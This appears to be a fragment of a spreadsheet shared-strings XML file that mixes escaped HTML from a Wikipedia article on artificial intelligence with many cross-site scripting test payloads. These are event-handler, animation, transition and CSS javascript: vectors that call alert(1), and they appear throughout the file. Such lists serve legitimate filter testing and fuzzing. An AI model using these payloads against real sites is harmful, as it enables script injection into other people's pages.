    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFSearle1980" class="citation journal"&gt;&lt;a href="/wiki/John_Searle" title="John Searle"&gt;Searle, John &lt;/a&gt; (1980). &lt;a rel="nofollow" class="external text" href="http://cogprints.org/7150/1/10.1.1.83.5248.pdf"&gt;"Minds, Brains and Programs" &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;acronym draggable="true" ondragleave="alert(1)"&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Hierarchical_temporal_memory-244"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Hierarchical_temporal_memory_244-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;History </t>
  </si>
  <si>
    <t>&lt;section onmousedown="alert(1)"&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;big onmousedown="alert(1)"&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Evolutionary_algorithm" title="Evolutionary algorithm"&gt;Evolutionary algorithm &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dd onkeydown="alert(1)" contenteditable&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;meter id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/meter&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="templatequotecite"&gt;—&amp;#8201;&lt;cite&gt;&lt;a href="/wiki/Stephen_Hawking" title="Stephen Hawking"&gt;Stephen Hawking &lt;/a&gt;&lt;sup id="cite_ref-367" class="reference"&gt;&lt;a href="#cite_note-367"&gt;&amp;#91;356&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;/cite&gt; &lt;/div&gt; &lt;/blockquote&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">         &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption draggable="true" ondragstart="alert(1)"&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onpointermove=alert(1)&gt;XSS&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onbeforecopy="alert(1)" contenteditable&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;tt draggable="true" ondragend="alert(1)"&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;span id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/span&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="http://www.sciencemag.org/news/2018/01/artificial-intelligence-can-evolve-solve-problems"&gt;"Artificial intelligence can 'evolve' to solve problems" &lt;/a&gt;. &lt;i&gt;Science | AAAS &lt;/i&gt;. 10 January 2018&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;7 February </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Understanding" title="Understanding"&gt;Understanding &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;button onmouseleave="alert(1)"&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Electronic_voting" title="Electronic voting"&gt;Electronic voting &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="faq.html"&gt;Frequently Asked Questions&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;button onload=alert(1)&gt;&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;table onpointerenter=alert(1)&gt;XSS&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/email.html"&gt;&lt;span class="doc"&gt;Sending e-mail</t>
  </si>
  <si>
    <t>&lt;pre oncontextmenu="alert(1)"&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;a ondrop=alert(1) contenteditable&gt;drop here&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Max_Tegmark" title="Max Tegmark"&gt;Max Tegmark &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;element onpointerover=alert(1)&gt;XSS&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;form onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/form&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/nextid&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;figure onpointermove=alert(1)&gt;XSS&lt;/figure&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">            &lt;div id="p-views" role="navigation" class="vectorTabs " aria-labelledby="p-views-label"&gt;</t>
  </si>
  <si>
    <t>&lt;thead onmouseenter="alert(1)"&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-307"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-307"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;picture&gt;&lt;source srcset="validimage.png"&gt;&lt;image onloadend=alert(1)&gt;&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;/h2&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Scientific_skepticism" class="mw-redirect" title="Scientific skepticism"&gt;Scientific skepticism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;html oncontextmenu="alert(1)"&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;rb onpointermove=alert(1)&gt;XSS&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a rel="nofollow" class="external text" href="https://www.bbc.co.uk/programmes/p003k9fc"&gt;Artificial Intelligence &lt;/a&gt;, BBC Radio 4 discussion with John Agar, Alison Adam &amp;amp; Igor Aleksander (&lt;i&gt;In Our Time &lt;/i&gt;, Dec. 8, 2005) &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/downloader-middleware.html"&gt;Downloader Middleware&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Distillations&amp;amp;rft.atitle=Thinking+Machines%3A+The+Search+for+Artificial+Intelligence&amp;amp;rft.volume=2&amp;amp;rft.issue=2&amp;amp;rft.pages=14-23&amp;amp;rft.date=2016&amp;amp;rft.aulast=Roberts&amp;amp;rft.aufirst=Jacob&amp;amp;rft_id=https%3A%2F%2Fwww.sciencehistory.org%2Fdistillations%2Fmagazine%2Fthinking-machines-the-search-for-artificial-intelligence&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-392"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-392"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;video oncopy="alert(1)" contenteditable&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;sub id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/sub&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Intractably" class="mw-redirect" title="Intractably"&gt;Intractability and efficiency &lt;/a&gt; and the &lt;a href="/wiki/Combinatorial_explosion" title="Combinatorial explosion"&gt;combinatorial explosion &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;title id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;p class="caption"&gt;&lt;span class="caption-text"&gt;All the rest</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Lohr, Steve (28 February 2016). &lt;a rel="nofollow" class="external text" href="https://www.nytimes.com/2016/02/29/technology/the-promise-of-artificial-intelligence-unfolds-in-small-steps.html"&gt;"The Promise of Artificial Intelligence Unfolds in Small Steps" &lt;/a&gt;. &lt;i&gt;&lt;a href="/wiki/The_New_York_Times" title="The New York Times"&gt;The New York Times &lt;/a&gt; &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20160229171843/http://www.nytimes.com/2016/02/29/technology/the-promise-of-artificial-intelligence-unfolds-in-small-steps.html"&gt;Archived &lt;/a&gt; from the original on 29 February 2016&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;29 February </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Classifiers_and_statistical_learning_methods"&gt;Classifiers and statistical learning methods </t>
  </si>
  <si>
    <t>&lt;sup onbeforepaste="alert(1)" contenteditable&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;input id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/input&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Search_and_optimization"&gt;Search and optimization </t>
  </si>
  <si>
    <t>&lt;rt onpaste="alert(1)" contenteditable&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;del onmouseleave="alert(1)"&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="/en/1.4/"&gt;1.4&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;header onblur=alert(1) tabindex=1 id=x&gt;&lt;/header&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;section id=x tabindex=1 onactivate=alert(1)&gt;&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/abbr&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFMoravec1988"&gt;Moravec 1988 &lt;/a&gt;, p.&amp;#160;13, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dfn oncopy="alert(1)" contenteditable&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Logic" title="Logic"&gt;Logic &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;nav id=x tabindex=1 onactivate=alert(1)&gt;&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Algorithm_design" class="mw-redirect" title="Algorithm design"&gt;Algorithm design &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;blink onpointerenter=alert(1)&gt;XSS&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;xmp onpointerover=alert(1)&gt;XSS&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;bdi id=x tabindex=1 onfocus=alert(1)&gt;&lt;/bdi&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Administrator. &lt;a rel="nofollow" class="external text" href="http://www.i-programmer.info/news/105-artificial-intelligence/2176-kinects-ai-breakthrough-explained.html"&gt;"Kinect's AI breakthrough explained" &lt;/a&gt;. &lt;i&gt;i-programmer.info &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20160201031242/http://www.i-programmer.info/news/105-artificial-intelligence/2176-kinects-ai-breakthrough-explained.html"&gt;Archived &lt;/a&gt; from the original on 1 February 2016. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=i-programmer.info&amp;amp;rft.atitle=Kinect%27s+AI+breakthrough+explained&amp;amp;rft.au=Administrator&amp;amp;rft_id=http%3A%2F%2Fwww.i-programmer.info%2Fnews%2F105-artificial-intelligence%2F2176-kinects-ai-breakthrough-explained.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_robotics" title="Glossary of robotics"&gt;Robotics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Machine_ethics" title="Machine ethics"&gt;Machine ethics &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;img id=x tabindex=1 onactivate=alert(1)&gt;&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;83–102, 163–176 &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-282"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-282"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;A common &lt;a href="/wiki/Trope_(literature)" title="Trope (literature)"&gt;trope &lt;/a&gt; in these works began with &lt;a href="/wiki/Mary_Shelley" title="Mary Shelley"&gt;Mary Shelley &lt;/a&gt;'s &lt;i&gt;&lt;a href="/wiki/Frankenstein" title="Frankenstein"&gt;Frankenstein &lt;/a&gt; &lt;/i&gt;, where a human creation becomes a threat to its masters. This includes such works as &lt;a href="/wiki/2001:_A_Space_Odyssey_(novel)" title="2001: A Space Odyssey (novel)"&gt;Arthur C. Clarke's &lt;/a&gt; and &lt;a href="/wiki/2001:_A_Space_Odyssey_(film)" title="2001: A Space Odyssey (film)"&gt;Stanley Kubrick's &lt;/a&gt; &lt;i&gt;&lt;a href="/wiki/2001:_A_Space_Odyssey" title="2001: A Space Odyssey"&gt;2001: A Space Odyssey &lt;/a&gt; &lt;/i&gt; (both 1968), with &lt;a href="/wiki/HAL_9000" title="HAL 9000"&gt;HAL 9000 &lt;/a&gt;, the murderous computer in charge of the &lt;i&gt;&lt;a href="/wiki/Discovery_One" title="Discovery One"&gt;Discovery One &lt;/a&gt; &lt;/i&gt; spaceship, as well as &lt;i&gt;&lt;a href="/wiki/The_Terminator" title="The Terminator"&gt;The Terminator &lt;/a&gt; &lt;/i&gt; (1984) and &lt;i&gt;&lt;a href="/wiki/The_Matrix" title="The Matrix"&gt;The Matrix &lt;/a&gt; &lt;/i&gt; (1999). In contrast, the rare loyal robots such as Gort from &lt;i&gt;&lt;a href="/wiki/The_Day_the_Earth_Stood_Still" title="The Day the Earth Stood Still"&gt;The Day the Earth Stood Still &lt;/a&gt; &lt;/i&gt; (1951) and Bishop from &lt;i&gt;&lt;a href="/wiki/Aliens_(film)" title="Aliens (film)"&gt;Aliens &lt;/a&gt; &lt;/i&gt; (1986) are less prominent in popular culture.&lt;sup id="cite_ref-414" class="reference"&gt;&lt;a href="#cite_note-414"&gt;&amp;#91;402&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;link rel="edit" title="Edit this page" href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit"/&gt;</t>
  </si>
  <si>
    <t>&lt;font draggable="true" ondragleave="alert(1)"&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onmousedown="alert(1)"&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;font id=x tabindex=1 onfocus=alert(1)&gt;&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;aside onmouseup="alert(1)"&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;678–710, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;th id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;noscript ondblclick="alert(1)"&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;main draggable="true" ondragenter="alert(1)"&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;data onmouseup="alert(1)"&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation arxiv"&gt;Li, Xiangang; Wu, Xihong (2015). "Constructing Long Short-Term Memory based Deep Recurrent Neural Networks for Large Vocabulary Speech Recognition". &lt;a href="/wiki/ArXiv" title="ArXiv"&gt;arXiv &lt;/a&gt;:&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//arxiv.org/abs/1410.4281"&gt;1410.4281 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;meta draggable="true" ondragend="alert(1)"&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;picture onmouseleave="alert(1)"&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE type="text/css"&gt;BODY{background:url("&lt;javascript:alert&gt;('')")}&lt;/STYLE&gt;</t>
  </si>
  <si>
    <t>&lt;canvas id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/canvas&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;figure style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onmouseup="alert(1)"&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;th onbeforepaste="alert(1)" contenteditable&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;sup onbeforecopy="alert(1)" contenteditable&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Index_of_robotics_articles" title="Index of robotics articles"&gt;Index &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;rt onpointerover=alert(1)&gt;XSS&lt;/rt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FUKU1980-256"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FUKU1980_256-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Intentionality" title="Intentionality"&gt;Intentionality &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;A HREF="http://1113982867/"&gt;&lt;/A&gt;</t>
  </si>
  <si>
    <t>&lt;title onmouseenter="alert(1)"&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;script onmouseenter="alert(1)"&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;i onmouseout="alert(1)"&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onkeypress="alert(1)" contenteditable&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;wbr draggable="true" ondrag="alert(1)"&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;cite onpointerover=alert(1)&gt;XSS&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onbeforepaste="alert(1)" contenteditable&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;p onpointerout=alert(1)&gt;XSS&lt;/p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; 2007 </t>
  </si>
  <si>
    <t>&lt;li onbeforecut="alert(1)" contenteditable&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onbeforepaste="alert(1)" contenteditable&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;b onpointerover=alert(1)&gt;XSS&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;col draggable="true" ondragend="alert(1)"&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;acronym id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;div onmouseover="alert(1)"&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onmouseover="alert(1)"&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;strike oncut="alert(1)" contenteditable&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onkeyup="alert(1)" contenteditable&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onpaste="alert(1)" contenteditable&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;sup onclick="alert(1)"&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;div onmouseup="alert(1)"&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;strong style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Speech_recognition" title="Speech recognition"&gt;Speech recognition &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onmousemove="alert(1)"&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;form onpointerleave=alert(1)&gt;XSS&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;br onload=alert(1)&gt;&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;option id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/option&gt;</t>
  </si>
  <si>
    <t>Default reasoning and &lt;a href="/wiki/Default_logic" title="Default logic"&gt;default logic &lt;/a&gt;, &lt;a href="/wiki/Non-monotonic_logic" title="Non-monotonic logic"&gt;non-monotonic logics &lt;/a&gt;, &lt;a href="/wiki/Circumscription_(logic)" title="Circumscription (logic)"&gt;circumscription &lt;/a&gt;, &lt;a href="/wiki/Closed_world_assumption" class="mw-redirect" title="Closed world assumption"&gt;closed world assumption &lt;/a&gt;, &lt;a href="/wiki/Abductive_reasoning" title="Abductive reasoning"&gt;abduction &lt;/a&gt; (Poole &lt;i&gt;et al. &lt;/i&gt; places abduction under "default reasoning". Luger &lt;i&gt;et al. &lt;/i&gt; places this under "uncertain reasoning"):</t>
  </si>
  <si>
    <t>&lt;time id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/time&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;picture onmouseover="alert(1)"&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ul&gt;&lt;li&gt;&lt;cite id="CITEREFAsadaHosodaKuniyoshiIshiguro2009" class="citation journal"&gt;Asada, M.; Hosoda, K.; Kuniyoshi, Y.; Ishiguro, H.; Inui, T.; Yoshikawa, Y.; Ogino, M.; Yoshida, C. (2009). "Cognitive developmental robotics: a survey". &lt;i&gt;IEEE Transactions on Autonomous Mental Development &lt;/i&gt;. &lt;b&gt;1 &lt;/b&gt; (1): 12–34. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1109%2Ftamd.2009.2021702"&gt;10.1109/tamd.2009.2021702 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=IEEE+Transactions+on+Autonomous+Mental+Development&amp;amp;rft.atitle=Cognitive+developmental+robotics%3A+a+survey&amp;amp;rft.volume=1&amp;amp;rft.issue=1&amp;amp;rft.pages=12-34&amp;amp;rft.date=2009&amp;amp;rft_id=info%3Adoi%2F10.1109%2Ftamd.2009.2021702&amp;amp;rft.aulast=Asada&amp;amp;rft.aufirst=M.&amp;amp;rft.au=Hosoda%2C+K.&amp;amp;rft.au=Kuniyoshi%2C+Y.&amp;amp;rft.au=Ishiguro%2C+H.&amp;amp;rft.au=Inui%2C+T.&amp;amp;rft.au=Yoshikawa%2C+Y.&amp;amp;rft.au=Ogino%2C+M.&amp;amp;rft.au=Yoshida%2C+C.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;dialog onclick="alert(1)"&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;sup id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Margaret_Boden" title="Margaret Boden"&gt;Boden, Margaret &lt;/a&gt;, &lt;i&gt;Mind As Machine &lt;/i&gt;, &lt;a href="/wiki/Oxford_University_Press" title="Oxford University Press"&gt;Oxford University Press &lt;/a&gt;, 2006. &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;html onpointerenter=alert(1)&gt;XSS&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;article ondblclick="alert(1)"&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;samp draggable="true" ondragstart="alert(1)"&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;header onkeypress="alert(1)" contenteditable&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onpointerdown=alert(1)&gt;XSS&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;multicol style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;center oncontextmenu="alert(1)"&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;image2 onpointerout=alert(1)&gt;XSS&lt;/image2&gt;</t>
  </si>
  <si>
    <t>&lt;template onmouseleave="alert(1)"&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;picture onpointermove=alert(1)&gt;XSS&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;q id=x tabindex=1 onactivate=alert(1)&gt;&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;img onbeforecopy="alert(1)" contenteditable&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;ol onpointerout=alert(1)&gt;XSS&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;dl oncontextmenu="alert(1)"&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;small onmouseover="alert(1)"&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;h3  id="p-navigation-label"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=30" title="Edit section: Classifiers and statistical learning methods"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t xml:space="preserve">      v: latest</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div id="Note:_This_template_roughly_follows_the_2012_ACM_Computing_Classification_System."&gt;Note: This template roughly follows the 2012 &lt;a href="/wiki/ACM_Computing_Classification_System" title="ACM Computing Classification System"&gt;ACM Computing Classification System &lt;/a&gt;. &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Computer_hardware" title="Computer hardware"&gt;Hardware &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;meta onmouseenter="alert(1)"&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFACM1998"&gt;ACM 1998 &lt;/a&gt;, I.2.7 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;b id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/b&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
